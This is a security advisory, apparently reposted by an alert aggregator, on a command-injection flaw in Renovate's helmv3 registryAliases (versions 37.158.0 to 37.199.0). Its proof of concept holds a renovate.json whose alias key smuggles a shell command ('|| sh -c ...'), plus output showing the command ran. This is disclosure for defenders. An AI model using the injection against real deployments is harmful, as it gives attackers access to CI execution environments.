GHSA-rqgv-292v-5qgr: OS Command Injection
First published: Tue Apr 23 2024(Updated: )
### Summary Attackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 registryAliases to execute arbitrary commands. ### Details Since [#26848](https://github.com/renovatebot/renovate/pull/26848), `registryAliases` has become mergeable. This means that the helmv3 manager started honoring its value and uses a `helm repo add <key> <parameters>` command for each defined alias. See source code: https://github.com/renovatebot/renovate/blob/23f3df6216375cb5bcfe027b0faee304f877f891/lib/modules/manager/helmv3/artifacts.ts#L80 The key was not quoted, leading to the ability to use variable references (`$FOO`) in it and have them printed by Renovate on the pull request, or even running any shell commands. ### PoC Inside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example: test-chart/Chart.yaml: ``` apiVersion: v2 name: redis version: 1.0.0 dependencies: - name: redis version: 18.13.10 repository: oci://registry-1.docker.io/bitnamicharts ``` test-chart/Chart.lock: ``` dependencies: - name: redis repository: oci://registry-1.docker.io/bitnamicharts version: 18.13.10 digest: sha256:11267bd32ea6c5c120ddebbb9f21e4a3c7700a961aa1a27ddb55df1fb8059a38 generated: "2024-02-16T13:31:20.807026334Z" ``` Then add the following `renovate.json`: ```json { "$schema": "https://docs.renovatebot.com/renovate-schema.json", "extends": [ "config:base" ], "registryAliases": { "foo/bar || sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy" } } ``` Once Renovate runs on the repository, it will create a pull request, and add a comment titled "Artifact update problem" containing the following text: ``` File name: test-chart/Chart.lock Command failed: helm repo add foo/bar || sh -c 'ls /; exit 1' >&2 registry.example.com/proxy --force-update Error: "helm repo add" requires 2 arguments Usage: helm repo add [NAME] [URL] [flags] bin boot dev etc go home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var ``` This shows that the `ls` command executed successfully, and we can even see its output. Note that redirecting any output you want to see to stderr (`>&2`) and making sure the final command fails (`exit 1`) is required in this case, as Renovate only adds a comment if the command fails, and it contains only stderr (not stdout) output. ### Impact All Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.
| Affected Software | Affected Version | How to fix |
|---|---|---|
| npm/renovate | >=37.158.0<37.199.0 | 37.199.0 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://github.com/renovatebot/renovate/security/advisories/GHSA-rqgv-292v-5qgr
- https://github.com/renovatebot/renovate/commit/1e941fd885c799f2d38f4084a6f4cb9438813c8f
- https://github.com/renovatebot/renovate/blob/23f3df6216375cb5bcfe027b0faee304f877f891/lib/modules/manager/helmv3/artifacts.ts#L80
- https://github.com/advisories/GHSA-rqgv-292v-5qgr (Advisory)
- collector/github-advisory-latest
- source/GitHub
- alias/GHSA-rqgv-292v-5qgr
- agent/software-canonical-lookup
- agent/severity
- agent/references
- agent/last-modified-date
- agent/weakness
- agent/softwarecombine
- agent/event
- agent/type
- agent/first-publish-date
- agent/description
- agent/tags
- collector/github-advisory
- package-manager/npm